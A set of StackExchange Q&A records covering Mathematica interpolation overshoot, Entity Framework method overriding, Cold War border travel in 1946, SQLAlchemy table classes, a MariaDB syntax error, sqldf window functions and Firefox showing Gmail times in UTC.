42100.992643598314`}, {99.9907`, \n 19598.506481051947`}, {99.99080000000001`, \n 2447.884102815886`}, {99.9909`, 6050.762474493852`}, {99.991`, \n 47201.991349865326`}, {99.9911`, 141421.66859646593`}, {99.9912`, \n 300218.0575426925`}, {99.9913`, 528675.9641149845`}, {99.9914`, \n 823741.4573664954`}, {99.9915`, 1.1734966999925314`*^6}, {99.9916`,\n 1.5575965311706052`*^6}, {99.9917`, \n 1.9488858632768858`*^6}, {99.9918`, \n 2.3160542286129966`*^6}, {99.9919`, \n 2.6270326145706433`*^6}, {99.992`, \n 2.852719932349058`*^6}, {99.99210000000001`, \n 2.970559905168779`*^6}, {99.99220000000001`, \n 2.9674852618802455`*^6}, {99.99230000000001`, \n 2.841809004691841`*^6}, {99.9924`, \n 2.6037657460238747`*^6}, {99.9925`, \n 2.2745765447930614`*^6}, {99.99260000000001`, \n 1.8841060333862316`*^6}, {99.99270000000001`, \n 1.4673760546494084`*^6}, {99.9928`, \n 1.060367506635195`*^6}, {99.9929`, \n 695658.25368346`}, {99.99300000000001`, \n 398489.99935574655`}, {99.99310000000001`, \n 183822.56119456282`}, {99.9932`, 54819.36240358618`}, {99.9933`, \n 3026.5354262167316`}, {99.99340000000001`, \n 10280.101486167212`}, {99.99350000000001`, \n 52131.584079556276`}, {99.9936`, 102354.42420546012`}, {99.9937`, \n 137914.54566184452`}, {99.99380000000001`, \n 143685.80534156234`}, {99.9939`, 116183.81624423101`}, {99.994`, \n 65685.81312699754`}, {99.9941`, 16293.259464495655`}, {99.9942`, \n 3757.7396592063697`}, {99.9943`, 71196.78022114829`}, {99.9944`, \n 263136.03241681046`}, {99.9945`, 618585.1966204251`}, {99.9946`, \n 1.1640471696468873`*^6}, {99.9947`, \n 1.9074421621634928`*^6}, {99.9948`, \n 2.833882410239052`*^6}, {99.9949`, 3.90405567313237`*^6}, {99.995`,\n 5.055682072659491`*^6}, {99.99510000000001`, \n 6.208131261346862`*^6}, {99.99520000000001`, \n 7.269868799615699`*^6}, {99.99530000000001`, \n 8.1479962141799`*^6}, {99.9954`, 8.758813651212059`*^6}, {99.9955`,\n 9.038114802770944`*^6}, {99.99560000000001`, \n 8.949861198259037`*^6}, {99.99570000000001`, \n 8.491995143812856`*^6}, {99.9958`, \n 7.6984334207765255`*^6}, {99.9959`, \n 6.636718223481769`*^6}, {99.99600000000001`, \n 5.401335544570164`*^6}, {99.99610000000001`, \n 4.1032876411022553`*^6}, {99.9962`, \n 2.8570501793411407`*^6}, {99.9963`, \n 1.7664844156866106`*^6}, {99.99640000000001`, \n 911546.0560149102`}, {99.99650000000001`, \n 337687.72504541057`}, {99.9966`, 49662.31616212789`}, {99.9967`, \n 11014.220485333051`}, {99.99680000000001`, \n 149916.70067926153`}, {99.9969`, 371249.42592296394`}, {99.997`, \n 573985.0440702039`}, {99.9971`, 672172.6613239779`}, {99.9972`, \n 617162.7093132898`}, {99.9973`, 418298.5610825093`}, {99.9974`, \n 159190.11126375137`}, {99.9975`, 6889.055099344037`}, {99.9976`, \n 211857.28903701573`}, {99.9977`, 1.097445484728616`*^6}, {99.9978`,\n 3.038700743165044`*^6}, {99.9979`, \n 6.431489307696678`*^6}, {99.998`, \n 1.1654127256214151`*^7}, {99.99810000000001`, \n 1.9024725313095316`*^7}, {99.99820000000001`, \n 2.875825988533397`*^7}, {99.99830000000001`, \n 4.092775280583405`*^7}, {99.9984`, \n 5.5433955481785744`*^7}, {99.9985`, \n 7.198736932275228`*^7}, {99.99860000000001`, \n 9.010559231046714`*^7}, {99.99870000000001`, \n 1.0912756879132845`*^8}, {99.9988`, \n 1.2824493566283156`*^8}, {99.9989`, \n 1.4654876982895207`*^8}, {99.99900000000001`, \n 1.630887950398025`*^8}, {99.99910000000001`, \n 1.7694038798517886`*^8}, {99.9992`, \n 1.8727407690049762`*^8}, {99.9993`, \n 1.934212083241554`*^8}, {99.99940000000001`, \n 1.9493079448759955`*^8}, {99.99950000000001`, \n 1.9161105149283525`*^8}, {99.9996`, \n 1.8355199261690336`*^8}, {99.9997`, \n 1.7112742180357695`*^8}, {99.99980000000001`, \n 1.5497651606295362`*^8}, {99.9999`, \n 1.3598374683380157`*^8}, {100.`, \n 1.1509227841822496`*^8}, {100.0001`, \n 9.35316855233305`*^7}, {100.0002`, \n 7.231025004379873`*^7}, {100.0003`, \n 5.256660434840215`*^7}, {100.0004`, \n 3.521381099545413`*^7}, {100.0005`, \n 2.096762182207146`*^7}, {100.0006`, \n 1.0307175273951748`*^7}, {100.0007`, \n 3.443687074219937`*^6}, {100.0008`, \n 319172.0909938909`}, {100.0009`, 624886.4691508369`}, {100.001`, \n 3.839629652685036`*^6}, {100.00110000000001`, \n 9.282792159957027`*^6}, {100.00120000000001`, \n 1.617690363214594`*^7}, {100.00130000000001`, \n 2.371457960763766`*^7}, {100.0014`, \n 3.1123276998223003`*^7}, {100.00150000000001`, \n 3.772278285822957`*^7}, {100.00160000000001`, \n 4.297077901877572`*^7}, {100.00170000000001`, \n 4.649332297408372`*^7}, {100.0018`, \n 4.809858468949901`*^7}, {100.0019`, \n 4.777386804395814`*^7}, {100.00200000000001`, \n 4.566746227227442`*^7}, {100.00210000000001`, \n 4.205818439052258`*^7}, {100.0022`, \n 3.731643524344679`*^7}, {100.0023`, \n 3.186112453043561`*^7}, {100.00240000000001`, \n 2.611684639639511`*^7}, {100.00250000000001`, \n 2.0475351093277786`*^7}, {100.0026`, \n 1.526456928610898`*^7}, {100.0027`, \n 1.0727432825096259`*^7}, {100.00280000000001`, \n 7.01155356380699`*^6}, {100.0029`, \n 4.1696218231500047`*^6}, {100.003`, \n 2.1693002162992805`*^6}, {100.0031`, \n 910514.5775877895`}, {100.0032`, 247468.92969395986`}, {100.0033`, \n 12466.399693349336`}, {100.0034`, 38713.52052913366`}, {100.0035`, \n 179679.7590042069`}, {100.0036`, 323213.6387249924`}, {100.0037`, \n 399394.1422363143`}, {100.0038`, 381919.9691393901`}, {100.0039`, \n 283614.326160101`}, {100.004`, \n 147264.125970723`}, {100.00410000000001`, \n 33457.5539198235`}, {100.00420000000001`, \n 7288.615010277445`}, {100.00430000000001`, \n 125771.23057228878`}, {100.0044`, \n 427548.6798790092`}, {100.00450000000001`, \n 926064.5824913883`}, {100.00460000000001`, \n 1.6068273548210126`*^6}, {100.00470000000001`, \n 2.428830198016985`*^6}, {100.0048`, \n 3.3296556940659885`*^6}, {100.0049`, \n 4.233355835687827`*^6}, {100.00500000000001`, \n 5.059908642966373`*^6}, {100.00510000000001`, \n 5.734928561736933`*^6}, {100.0052`, \n 6.198363502951681`*^6}, {100.0053`, \n 6.411118533755151`*^6}, {100.00540000000001`, \n 6.35887575814467`*^6}, {100.00550000000001`, \n 6.052779744495396`*^6}, {100.0056`, \n 5.527073307789168`*^6}, {100.0057`, \n 4.834148684727312`*^6}, {100.00580000000001`, \n 4.037775067693357`*^6}, {100.0059`, \n 3.2054465135499393`*^6}, {100.006`, \n 2.400845094917662`*^6}, {100.0061`, \n 1.6773369586025865`*^6}, {100.0062`, \n 1.0732294466178913`*^6}, {100.0063`, \n 609246.9462916934`}, {100.0064`, 288371.9280090763`}, {100.0065`, \n 97885.98961812796`}, {100.0066`, 13175.954352500674`}, {100.0067`, \n 2671.8581152992074`}, {100.0068`, 33180.8081956854`}, {100.0069`, \n 74879.15044292489`}, {100.007`, \n 105320.26006151935`}, {100.00710000000001`, \n 111989.1796066404`}, {100.00720000000001`, \n 93159.75531063265`}, {100.00730000000001`, \n 57054.633435510834`}, {100.0074`, \n 19538.03841524044`}, {100.00750000000001`, \n 758.3242056625403`}, {100.00760000000001`, \n 21277.671150084952`}, {100.00770000000001`, \n 98268.79276605384`}, {100.0078`, 242320.59325159696`}, {100.0079`, \n 455285.73967379465`}, {100.00800000000001`, \n 729441.1594492072`}, {100.00810000000001`, \n 1.0480410677191823`*^6}, {100.0082`, \n 1.3871489717460165`*^6}, {100.0083`, \n 1.7184649917589629`*^6}, {100.00840000000001`, \n 2.012740522166382`*^6}, {100.00850000000001`, \n 2.2433073813179927`*^6}, {100.0086`, \n 2.3892498069632286`*^6}, {100.0087`, \n 2.437811768754389`*^6}, {100.00880000000001`, \n 2.385747887226385`*^6}, {100.0089`, \n 2.239476243883074`*^6}, {100.009`, \n 2.0140542725085174`*^6}, {100.0091`, \n 1.7311522326453237`*^6}, {100.0092`, \n 1.4163228918969373`*^6}, {100.0093`, \n 1.095945353432984`*^6}, {100.0094`, \n 794247.1192294351`}, {100.0095`, 530779.7536792547`}, {100.0096`, \n 318646.5975802199`}, {100.0097`, 163667.62190115865`}, {100.0098`, \n 64533.7233387026`}, {100.0099`, 13868.84376476787`}, {100.01`, \n 1.4778114216281888`}}]\n<\/code>\nI can interpolate the data with\n<code>Clear[Interpolate]\nInterpolate[100] = Interpolation[data4[100], InterpolationOrder -> 2];\n<\/code>\nHowever, I noticed that <code>Interpolation[]<\/code> gives negative values in a small domain of my interpolation:\n<code>Plot[Interpolate[100][x], {x, 99.98, 100.01}, PlotRange -> All]\n<\/code>\n\n<code>Plot[Interpolate[100][x], {x, 100.0033, 100.0034}, \n PlotRange -> {-2*10^4, 0}]\n<\/code>\n\nWhy is <code>Interpolation[]<\/code> giving a negative value when none of the data gives negative values? I had looked at this question, which suggested adding <code>InterpolationOrder<\/code>, but unfortunately this solution had no effect.\nComment: Interpolation is in general not monotonic. There can be overshoot (see https:\/\/en.wikipedia.org\/wiki\/Runge's_phenomenon). You can enforce monotonicity by using 1st order interpolation, or https:\/\/en.wikipedia.org\/wiki\/Monotone_cubic_interpolation. As a side note, `Interpolate` is a very bad name for a variable!\nComment: Strongly related: \"[Monotone, periodic 1d-interpolation with continuous 1st order derivative](https:\/\/mathematica.stackexchange.com\/q\/14662\/280).\"\nAnswer: One good way to interpolate a function of this nature is to take its <code>Log<\/code>, interpolate, and take <code>Exp<\/code> of the result.\n<code>lntrp = Interpolation[data4[100] \/. {x_, y_} -> {x, Log[y]}]\nPlot[Exp[lntrp[x]], {x, 99.98, 100.01}, PlotRange -> All]\n<\/code>\nComment: This is a very good answer.\nAnswer: Too long for a comment to John Doty's answer: \nWhile the answer might suit your needs (i.e. a smooth curve that passes through your points and remains positive), I would not say that it is a good way of interpolating.\nIn the example below, I illustrate two bad properties of taking the exponential of log-interpolated values:\n\nsensitivity to vertical translation (the interpolation is sensitive to a vertical translation)\nsensitivity to small absolute variations near 0\n\nNaturally, these two \"properties\" are related.\n<code> data1 = {{0, 1}, {1, 10^-3}, {2, 1}};\n data2 = {{0, 1}, {1, 0}, {2, 1}} \/. {x_, y_} -> {x, y + 1};\n data3 = {{0, 1}, {1, 10^-5}, {2, 1}};\n<\/code>\nOne would expect interpolation of these three datasets to have quasi-exact same shapes. It is the case with \"classic\" interpolation:\n<code>int1 = Interpolation[data1, InterpolationOrder -> 2];\nint2 = Interpolation[data2, InterpolationOrder -> 2];\nint3 = Interpolation[data3, InterpolationOrder -> 2];\nPlot[{int1[t], int2[t] - 1, int3[t]}, {t, 0, 2}]\n<\/code>\n\nBut not at all with the \"Log-Exp trick\":\n<code>int4 = Interpolation[data1 \/. {x_, y_} -> {x, Log[y]}, InterpolationOrder -> 2];\nint5 = Interpolation[data2 \/. {x_, y_} -> {x, Log[y]}, InterpolationOrder -> 2];\nint6 = Interpolation[data3 \/. {x_, y_} -> {x, Log[y]}, InterpolationOrder -> 2];\nPlot[{Exp@int4[t], -1 + Exp@int5[t], Exp@int6[t]}, {t, 0, 2}]\n<\/code>\n\nSo maybe it is good enough for you in this case, but I would not recommend it generally speaking (and I would interrogate myself on the grounds to create an interpolation method that works only on a limited domain - positive values). \nComment: The problem is intrinsically unsymmetrical: zero is a line that must not be crossed, but there is no upper limit. Looking at the function, the peaks are rounded, but the valleys are nearly flat. The `Log` method reflects this, while you seem to insist that a proper method should not.\nComment: However, the `Log-Exp` pair can be replaced with any other functional pair such that $f(g(x))=x$ and $f(x)>0$ for domain of interest. For instance `g[x]=Sqrt[x]` and `f[x]=x^2`.\nComment: @yarchik Of course, but with the same drawback more or less amplified (based on the slope of $g$). Bottom line: what is the missing information that is sought between the known points? If the purpose of interpolating is to take the derivative, that could be a very bad strategy.\nAnswer: Linear interpolation doesn't show this over\/under-swinging behavior of polynomial interpolation of higher order.\n<code>Clear[Interpolate]\nInterpolate[100] = Interpolation[data4[100], InterpolationOrder -> 1];\n\nPlot[Interpolate[100][x], {x, 100.0033, 100.0034}, PlotRange -> {-2*10^4, +10*10^4}]\n<\/code>\n\nAlternatively, if you don't want to use linear interpolation you can use Akima Interpolation which gives very smooth results with little over\/undershooting.\n<code>f = ResourceFunction[\"AkimaInterpolation\"][data4[100]];\nPlot[f[x], {x, 99.98, 100.01}, PlotRange -> All]\n<\/code>\n\n<code>Plot[Interpolate[100][x], {x, 100.0033, 100.0034}, PlotRange -> {-2*10^4, +10*10^4}]\n<\/code>\nComment: +1 for `AkimaInterpolation` - I saw the author of that function give a talk on it a couple of days ago. Much more satisfying than the accepted answer.\n","meta":{"source":"mathematica.stackexchange","title":"Interpolation[] gives negative values when all the initial data is positive","dup_signals":{}},"subset":"stackexchange"} +{"text":"Overriding virtual method with generics and constraints\n\nQuestion: I'm trying to override the <code>DbContext.Set<TEntity>()<\/code> method.\nIt's signature is:\n<code>public virtual DbSet<TEntity> Set<TEntity>() where TEntity : class\n<\/code>\nFirst I tried this:\n<code>public override DbSet<TEntity> Set<TEntity>()\n{\n return base.Set<TEntity>();\n}\n<\/code>\n... but I get the error:\n\nThe type 'TEntity' must be a reference type in order to use it as parameter 'TEntity' in the generic type or method 'System.Data.Entity.DbContext.Set()'\n\n... so I then tried specifiying it was a reference type:\n<code>public override DbSet<TEntity> Set<TEntity>() where TEntity: class\n{\n return base.Set<TEntity>();\n}\n<\/code>\n... and I now get:\n\nConstraints for override and explicit interface implementation methods are inherited from the base method, so they cannot be specified directly.\n\n... and if I take it away, I'm back to the first error.\nSo what does the C# compiler want me to do?\nAnswer: Well this is lame... I was using version 6.0.0 of Entity Framework.\nIn 6.0.0 (after digging through the history of the project on Code Plex, I found out that <code>Set<TEntity>()<\/code> wasn't <code>virtual<\/code> back then.\nShame the compiler couldn't say that, rather than sending me round the houses.\nAnyway, updating Entity Framework to 6.1.x (where it is <code>virtual<\/code>), solved the problem;\n<code>Update-Package EntityFramework\n<\/code>\nComment: Nice find. A tip if you encounter a problem like this again: you can always right-click \"Set\" in `base.Set` and choose \"Go to definition\" in Visual Studio, even if you don't have the Entity Framework source code installed locally. There, you would have seen that the method wasn't virtual. And agreed that the compiler should give useful messages.\nAnswer: Can you please post an entire class.\nHere is how I am using and I can compile without any problem.\n<code>public class MyDBContext : DbContext\n{\n public override DbSet<TEntity> Set<TEntity>()\n {\n return base.Set<TEntity>();\n }\n}\n<\/code>\nPlease make sure that you are using latest Entity Framework (6.X)\nComment: Thanks, this got me on the right track; as soon as I removed the rest of the code in the class, the compiler changed it's message to \"`Set()` is not `virtual`; see my answer for what happened next... I don't have the rep to +1, but I don't think this is worthy of a -2 :(.\nComment: why my answer goes down? do you want us to help?\nComment: Make sure that you are using a right version. I am using EF 6.X\nComment: I don't have the reputation to up-vote or down-vote :(. It wasn't me! :(.\nComment: They have even introduced IDbContext so that you can automate Unit testing.\nComment: I know it might not be you there are alwyas some mischief around. You can mark this as answer if it helps.\n","meta":{"source":"stackoverflow","title":"Overriding virtual method with generics and constraints","dup_signals":{}},"subset":"stackexchange"} +{"text":"Was the Iron curtain actually present at the time of the Fulton speech?\n\nQuestion: On March 5th, 1946, Winston Churchill said in his Sinews of Peace speech that\n\nFrom Stettin in the Baltic to Trieste in the Adriatic, an iron curtain has descended across the Continent.\n\nAt the end of the 20th century the term \"Iron curtain\" meant the absence of movement of freedom between Eastern and Western blocs, i. e. it was hard for individuals and organizations to move from Eastern Europe to Western Europe and vice versa.\nDid such lack of freedom of movement exist at the time of the speech (March 1946), i. e. was it hard to impossible for individuals and goods to travel from places occupied by Western troops to those occupied by the Soviet ones and vice versa?\nIf, say, a Pole, wanted to emigrate from Poland in March 1946, could he or she easily leave the country?\nAnswer: Independent of political reasons, travel for private persons was greatly restricted until 1949.\nChurchill feared, correctly, that politicaly a division was being created by the Soviet Union to separate their area of influence from that of the Western Powers.\nOccupied Germany was still (in 1946) under common Allied control, so Germany was excluded by the use of the city name Stettin\n\nwhich was situated right\/east of the red area near the Baltic sea\n\nIn reality the city name of L\u00fcbeck could have been used\n\nwhich was situated left\/west of the red area where the thick black line starts on the Baltic sea\n\nthe purple was part of the agreed Soviet Zone\n\nwhick they occupied in July 1945 after the US troops withdraw\n\nBerlin was not part of the Soviet Zone\n\nbut was subdivided into Sectors under common Allied control\nthe common administration of the city effectively ended during the Berlin Blockade in September 1948\n\nAfter occupying their Zone in Germany, the Soviet Union started immediately to fortify their border to the US and UK Zones with bob wire.\nInterzonal traffic:\n\nFollowing the military occupation of Germany in May 1945, civilians were initially only allowed to leave their place of residence or its immediate vicinity with a permit from the garrison authority of their zone. By June 1945, the bus and train service within the respective garrison zones had been resumed on many stretches. However, the public train service did not run between the garrison zones. Nevertheless, there were numerous travelers who crossed the extensive uncontrolled boundaries between the garrison zones on foot, by bicycle or by hitch-hiking.\nOn June 30, 1946, the boundary between the Soviet garrison zone and the Western garrison zones (the American, British and French zones) was blocked. The Soviet military administration in Germany (SMAD) had previously asked the Allies to secure the line of demarcation to the Western zones. A special identification card, the Inter-zones Travel Passport (Germany), known as the inter-zones passport, was introduced by the Allies. This had to be applied for by citizens wishing to travel in occupied Germany.\n\nNot sure if the same is true for the areas inside Austria. The systematic closing of the borders started on the 26 May 1952, which included the borders between the Western Sectors of Berlin and the Soviet Zone.\nIt is assumed this is what led to the 'Iron' in the term used by Churchill.\nFor Czech border it was not so much the case in 1946, since the Soviets had less control there until the 1948 Czechoslovak coup d'\u00e9tat.\nIn general, travel for everyone (East and West citizens) was greatly restricted. Permits were needed for everything.\nAnother problem was documentation of the individuals were in a sorry state.\nI have seen Polish passports, issued for persons to work for the polish government as a representative to the US Military government in Frankfurt. Almost 1\/3 of it was filled with the needed permits to travel and stay there (add to that return trips home for consultations).\n\nFor an individual, even with reliable documents, it would have been very difficult due to the general chaos that exsited on both sides.\nAdd to that any political reasons against emigration that any of the local governments may have had, then 1946-49 were not good years for travelling.\nComment: Before the construction of the Berlin Wall the border between the four zones in Berlin was completely open. They did not even have border checks.\nComment: @FranzDrollig Saw a quote this morning with details of the initial activities, but can't find it at the moment. Will try later.\nComment: @fdb 1) Berlin was sub divided into Sectors. 2) Only former Berlin residents were permitted to return to Berlin, everyone else had to bypass the city since the infrastructure was destroyed. 3) 1948 the border between the western sectors and the Soviet Zone was also closed off. 4) A Permit was needed to enter or leave Berlin (no flights for private persons) 5) Even before the wall was built, sporadic checks were made at the east\/west sector borders. Non residents with luggage were often turned back.\nComment: @MarkJohnson Ad *After occupying their Zone in Germany, the Soviet Union started immediately to fortify their border to the US and UK Zones with bob wire.*: Can you please provide a source for this?\n","meta":{"source":"history.stackexchange","title":"Was the Iron curtain actually present at the time of the Fulton speech?","dup_signals":{}},"subset":"stackexchange"} +{"text":"Define sqlalchmey tables based on function input\n\nQuestion: This is a follow up question to this question.\nI'm trying to implement a function that generates a table.\nThe function looks like this:\n<code>import sqlalchemy as sql\nimport sqlalchemy.orm\n\nTableBase = sql.orm.declarative_base()\n\nclass _RealTimeDataBase(TableBase):\n __tablename__ = \"TBL_RealTimeData\"\n\n id = sql.Column(sql.INTEGER, primary_key=True)\n SubTestId = sql.Column(sql.INT)\n CellOrCup = sql.Column(sql.INT)\n TimeInfo = sql.Column(sql.INT)\n TestTemp = sql.Column(sql.FLOAT)\n OxygenHumid = sql.Column(sql.FLOAT)\n NitrogenHumi = sql.Column(sql.FLOAT)\n OTR = sql.Column(sql.FLOAT)\n TimeDe = sql.Column(sql.INT)\n LocalTime = sql.Column(sql.DATETIME)\n\ndef RealTimeData(testType: int):\n if testType == 1:\n class RealTimeDataFilm(_RealTimeDataBase): # Error occurs here (line 148) \n CoffOxy = sql.Column(sql.FLOAT)\n\n return RealTimeDataFilm\n else:\n class RealTimeDataPackage(_RealTimeDataBase):\n CoffOxy = None\n\n return RealTimeDataPackage\n<\/code>\nBasically the <code>CoffOxy<\/code> column only exits if the <code>TestType<\/code> is 1 otherwise it should be <code>None<\/code>.\nUnfortunately when I call the function the second time I run into this error:\n<code> File \"\/home\/gianl\/code\/Source Graphics\/labthink-permeability-reports\/permeability\/sqliteModels.py\", line 148, in RealTimeData\n class RealTimeDataFilm(_RealTimeDataBase):\n File \"\/opt\/anaconda\/envs\/labthink-permeability-reports\/lib\/python3.9\/site-packages\/sqlalchemy\/orm\/decl_api.py\", line 72, in __init__\n _as_declarative(reg, cls, dict_)\n File \"\/opt\/anaconda\/envs\/labthink-permeability-reports\/lib\/python3.9\/site-packages\/sqlalchemy\/orm\/decl_base.py\", line 126, in _as_declarative\n return _MapperConfig.setup_mapping(registry, cls, dict_, None, {})\n File \"\/opt\/anaconda\/envs\/labthink-permeability-reports\/lib\/python3.9\/site-packages\/sqlalchemy\/orm\/decl_base.py\", line 177, in setup_mapping\n return cfg_cls(registry, cls_, dict_, table, mapper_kw)\n File \"\/opt\/anaconda\/envs\/labthink-permeability-reports\/lib\/python3.9\/site-packages\/sqlalchemy\/orm\/decl_base.py\", line 312, in __init__\n self._setup_inheritance(mapper_kw)\n File \"\/opt\/anaconda\/envs\/labthink-permeability-reports\/lib\/python3.9\/site-packages\/sqlalchemy\/orm\/decl_base.py\", line 889, in _setup_inheritance\n raise exc.ArgumentError(\nsqlalchemy.exc.ArgumentError: Column 'CoffOxy' on class <class 'permeability.sqliteModels.RealTimeData.<locals>.RealTimeDataFilm'> conflicts with existing column 'TBL_RealTimeData.CoffOxy'\n<\/code>\nAlthough <code>CoffOxy<\/code> is not defined yet it still complains that I redefine it. How could I solve this error? Or is there another way to get the same logic working?\nLive example on colab (comment if the link is not working)\nAnswer: Figured it out I just need to define the classes outside of the function scope.\n<code>import sqlalchemy as sql\nimport sqlalchemy.orm\n\nTableBase = sql.orm.declarative_base()\n\nclass _RealTimeDataBase(TableBase):\n __tablename__ = \"TBL_RealTimeData\"\n\n id = sql.Column(sql.INTEGER, primary_key=True)\n SubTestId = sql.Column(sql.INT)\n CellOrCup = sql.Column(sql.INT)\n TimeInfo = sql.Column(sql.INT)\n TestTemp = sql.Column(sql.FLOAT)\n OxygenHumid = sql.Column(sql.FLOAT)\n NitrogenHumi = sql.Column(sql.FLOAT)\n OTR = sql.Column(sql.FLOAT)\n TimeDe = sql.Column(sql.INT)\n LocalTime = sql.Column(sql.DATETIME)\n\nclass _RealTimeDataPackage(_RealTimeDataBase):\n CoffOxy = None\n\nclass _RealTimeDataFilm(_RealTimeDataBase):\n CoffOxy = sql.Column(sql.FLOAT)\n\ndef RealTimeData(testType: int):\n if testType == 1:\n return _RealTimeDataFilm\n else:\n return _RealTimeDataPackage\n<\/code>\n","meta":{"source":"stackoverflow","title":"Define sqlalchmey tables based on function input","dup_signals":{}},"subset":"stackexchange"} +{"text":"Error 1064 in MySQL trying Forward Engineering\n\nQuestion: I'm new to MySQL and when I tried to do the \"Forward Engineer\" I've encountered this error: \n<code>ERROR: Error 1064: You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near '\n CONSTRAINT `fk_Vendite_Prodotti`\n FOREIGN KEY (`Prodotti_idProdotti`)\n ' at line 11\nSQL Code:\n -- -----------------------------------------------------\n -- Table `mydb`.`Vendite`\n -- -----------------------------------------------------\n CREATE TABLE IF NOT EXISTS `mydb`.`Vendite` (\n `idVendite` INT NOT NULL,\n `dataVendita` DATETIME NULL,\n `qta` INT NULL,\n `costo` FLOAT NULL,\n `Prodotti_idProdotti` INT NOT NULL,\n PRIMARY KEY (`idVendite`),\n INDEX `fk_Vendite_Prodotti_idx` (`Prodotti_idProdotti` ASC) VISIBLE,\n CONSTRAINT `fk_Vendite_Prodotti`\n FOREIGN KEY (`Prodotti_idProdotti`)\n REFERENCES `mydb`.`Prodotti` (`idProdotti`)\n ON DELETE NO ACTION\n ON UPDATE NO ACTION)\n ENGINE = InnoDB\n\nSQL script execution finished: statements: 6 succeeded, 1 failed\n\nFetching back view definitions in final form.\nNothing to fetch\n<\/code>\nI know there are a lot of questions about this topic but I've seen that it's a very specific. Also being new to SQL I have no idea what the problem could be\nAnswer: As far as concerns, MariaDB does not support invisible indexes (only MySQL 8.0 supports that), so the error comes from the use of the <code>VISIBLE<\/code> keyword.\nSince indexes are visible by default anyway, I would suggest just removing it:\n<code>CREATE TABLE IF NOT EXISTS `mydb`.`Vendite` (\n `idVendite` INT NOT NULL,\n `dataVendita` DATETIME NULL,\n `qta` INT NULL,\n `costo` FLOAT NULL,\n `Prodotti_idProdotti` INT NOT NULL,\n PRIMARY KEY (`idVendite`),\n INDEX `fk_Vendite_Prodotti_idx` (`Prodotti_idProdotti`),\n CONSTRAINT `fk_Vendite_Prodotti`\n FOREIGN KEY (`Prodotti_idProdotti`)\n REFERENCES `mydb`.`Prodotti` (`idProdotti`)\n ON DELETE NO ACTION\n ON UPDATE NO ACTION\n) ENGINE = InnoDB\n<\/code>\n","meta":{"source":"stackoverflow","title":"Error 1064 in MySQL trying Forward Engineering","dup_signals":{}},"subset":"stackexchange"} +{"text":"How to use row_number and partition function in sqldf\n\nQuestion: Update\nI can run below sql query in netezza database, but it goes wrong in sqldf package in R\n<code>> sqldf(\"SELECT TEXT, \n+ VEH_MAKE_NM, \n+ NEW_USED_CD, \n+ PRODUCT, \n+ OVERALL_SUBV_IND, \n+ AS_OF_DATE, \n+ CATEGORY,\n+ ROW_NUMBER() OVER(PARTITION BY TEXT, VEH_MAKE_NM, NEW_USED_CD, PRODUCT, OVERALL_SUBV_IND, AS_OF_DATE ORDER BY CATEGORY DESC) RN_CATEGORY,\n+ SUBCATEGORY,\n+ ROW_NUMBER() OVER(PARTITION BY TEXT, VEH_MAKE_NM, NEW_USED_CD, PRODUCT, OVERALL_SUBV_IND, AS_OF_DATE ORDER BY SUBCATEGORY DESC) RN_SUBCATEGORY\n+ FROM output\n+ --GROUP BY 1,2,3,4,5,6\")\nError in sqliteSendQuery(con, statement, bind.data) : \n error in statement: near \"(\": syntax error\n<\/code>\nI think it might because sqldf package doesn't support netezza SQL. Is there a netezza sql package in R?\nThanks\nComment: The only sqldf backend that supports partition is PostgreSQL.\nComment: Hi @vkp, tried both `==` and `=`, neither of them works...\nComment: Same... I tried `' '`, `\" \"` and ` `, all did not work\nComment: is `CATEGORY` a column name in one of the tables? and if you use `\"\"` around it, it will be case-sensitive\nComment: I changed `\"CATEGORY\"` into `CATEGORY` and it turns out that the problem is in these two rows: \n`ROW_NUMBER() OVER(PARTITION BY TEXT, VEH_MAKE_NM, NEW_USED_CD, PRODUCT, OVERALL_SUBV_IND, AS_OF_DATE ORDER BY CATEGORY DESC) RN_CATEGORY,\n SUBCATEGORY,\n ROW_NUMBER() OVER(PARTITION BY TEXT, VEH_MAKE_NM, NEW_USED_CD, PRODUCT, OVERALL_SUBV_IND, AS_OF_DATE ORDER BY SUBCATEGORY DESC) RN_SUBCATEGORY`\nComment: When I use RPostgreSQL package, do I need to set a database as well? Or I can just use its function. Cause when I run the code... it seems like asking for a database\nComment: See sqldf FAQ#12 on the sqldf home page: https:\/\/github.com\/ggrothendieck\/sqldf\nComment: Since this posts sqlite added support for partition.\nAnswer: Step 1. Add row number column into output dataframe:\n<code>output['RN_CATEGORY'] = output.sort_values(['CATEGORY'], \n ascending=False).groupby(['TEXT', 'VEH_MAKE_NM', 'NEW_USED_CD', 'PRODUCT', \n 'OVERALL_SUBV_IND', 'AS_OF_DATE']).cumcount() + 1\n\noutput['RN_SUBCATEGORY'] =output.sort_values(['SUBCATEGORY'], \n ascending=False).groupby(['TEXT', 'VEH_MAKE_NM', 'NEW_USED_CD', 'PRODUCT', \n 'OVERALL_SUBV_IND', 'AS_OF_DATE']).cumcount() + 1\n<\/code>\nStep 2.\n<code>sqldf(\"SELECT TEXT, \n VEH_MAKE_NM, \n NEW_USED_CD, \n PRODUCT, \n OVERALL_SUBV_IND, \n AS_OF_DATE, \n CATEGORY,\n RN_CATEGORY,\n SUBCATEGORY,\n RN_SUBCATEGORY\n FROM output\n--GROUP BY 1,2,3,4,5,6\")\n<\/code>\nComment: As it's currently written, your answer is unclear. Please [edit] to add additional details that will help others understand how this addresses the question asked. You can find more information on how to write good answers [in the help center](\/help\/how-to-answer).\n","meta":{"source":"stackoverflow","title":"How to use row_number and partition function in sqldf","dup_signals":{}},"subset":"stackexchange"} +{"text":"Gmail in firefox showing time in UTC, but not in chromium\n\nQuestion: The time of emails in Gmail shows up in UTC in Firefox, but they are in Local time in Chromium. Calendar shows the local time.\nHow to fix this?\nComment: IMO you made the wrong fix when you changed Ubuntu to derive time from local. Windows is the outlier for using local time instead of UTC. This is a vestige from pre-internet that they are overdue on fixing. I'd suggest changing Ubuntu and Windows to derive time from UTC.\nComment: I entered the command `timedatectl set-local-rtc 0` but the issue is still there. Also previously the system clock was in RTC. Why would gmail use UTC anyway?\nComment: The issue is present only in firefox irrespective of whether system clock is set to UTC or RTC. I have updated the question.\nAnswer: I found it. The entry <code>privacy.resistFingerprinting => true<\/code> in <code>about:config<\/code> forces every website to use UTC.\nThere is no other way to use local time zone in Gmail without being tracked by fingerprinting services, which is an annoying bug arising from extra security, because the user may want to resist fingerprinting, but still use local time.\nThis answer is based on https:\/\/support.mozilla.org\/en-US\/questions\/1212634\n","meta":{"source":"askubuntu","title":"Gmail in firefox showing time in UTC, but not in chromium","dup_signals":{}},"subset":"stackexchange"} +{"text":"Java NoClassDefFoundError even when Jars in same 